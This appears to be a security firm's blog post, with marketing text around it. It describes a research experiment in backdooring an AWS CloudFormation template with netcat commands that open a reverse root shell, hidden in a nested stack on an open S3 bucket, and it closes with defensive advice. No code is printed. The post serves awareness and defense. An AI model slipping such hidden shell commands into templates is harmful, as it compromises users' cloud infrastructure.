Every Solution You Can Imagine – and More
What cybersecurity solution do you need? From Zero Trust to ADR, IAM, risk/privacy, data protection, AppSec and threat, securing digital transformation, to resiliency and remediation, we can build the right program to help solve your challenges.
A Single Partner for Everything You Need
Optiv works with more than 400 world-class security technology partners. By putting you at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can.
We Are Optiv
Greatness is every team working toward a common goal. Winning in spite of cyber threats and overcoming challenges in spite of them. It’s building for a future that only you can create or simply coming home in time for dinner.
However you define greatness, Optiv is in your corner. We manage cyber risk so you can secure your full potential.
CloudFormation Templates: What’s in That Stack?
What would happen if someone provisioned a stack from a blog post that created new identity access management (IAM) roles, disabled logging services or created new security groups? Would you know?
In preparation for a research project I needed to create the AWS infrastructure that would be used to run Docker, Kubernets and our containerized app. I also needed to enable and configure multiple AWS resources, which included EC2 instances, SecurityGroups, Subnets and IAM Roles. With a working knowledge of the basic resources needed for the project I turned to Google in the hope of locating an example. I quickly stumbled upon a few helpful CloudFormation templates (CFTs) from someone who had undertaken a similar project.
CloudFormation templates can be used to spin up individual resources or entire environments. The templates are text files and are commonly formatted in json, yaml or template. Templates define the properties of the resource(s) a user seeks to provision. These templates are managed, updated and deployed as a unit known as a stack. After a formation template is written, it can be used in other AWS environments simply by changing a few resource parameters.
To launch the CloudFormation template I located in my Google search all I had to do was click a button to the blog post, which then pivoted into my AWS management console and began the deployment.
Easy, right? All too easy.
Once the underlying infrastructure of the project was provisioned and working, I went back and took a deeper look at one of the templates and wondered what the file was doing. I provisioned first and asked questions later.
Not the best idea.
Scrolling through the yaml file I saw code that had the EC2 instance installing and executing commands as part of the provisioning process.
My curiosity was piqued. How easy would it be to backdoor a CloudFormation template? I decided to add two commands to the CFT: the first installs nmap-ncat and the second uses netcat to connect to a remote listener.
Upon creation of the stack, I now had a working EC2 instance, but there was already a remote root shell connection.
Great, but somewhat obvious to anyone who took a second to glance at the CFT. How could I hide the malicious commands from the user? AWS CFT allows for nested stacks. The top-level stack is called a root stack. A root stack can have one or more nested stacks beneath it that provision additional resources.
The image below shows that root stack calls a nested stack for the resource GitlabInstance. The nested stack uses another CFT template located on an open S3 bucket.
As before, the complete stack is deployed using the AWS console and success. The formation template spins up a working EC2 instance that connects back to the listener.
Conclusion: CFTs need to be analyzed first.
This is an example of a basic formation template attack. It’s opportunistic and it would be very hard to target a specific organization in this manner, but it clearly illustrates that CloudFormation templates (CFTs) need to be analyzed prior to deployment.
We suggest prevention tools.
From a security perspective it is critical to understand the actions within the formation template before it is deployed. If there are nested stacks being called, they need to be analyzed as well.
Analyze what resources are being provisioned, what they’re used for and if the resources are labeled. For example, if a security group is created look closely at inbound and outbound rules. Most CFTs I’ve seen only create security groups that lock down incoming connections, leaving outbound wide open. This was the case for the formation template used in the example above.
Make sure users deploying the formation templates don’t have overly permissive permissions. If the formation templates are compromised, then users may not have the appropriate resources to deploy malicious resources.
Several cybersecurity solution providers have the ability to scan formation templates for malicious behavior. Use them.
Let us know what you need, and we will have an Optiv professional contact you shortly.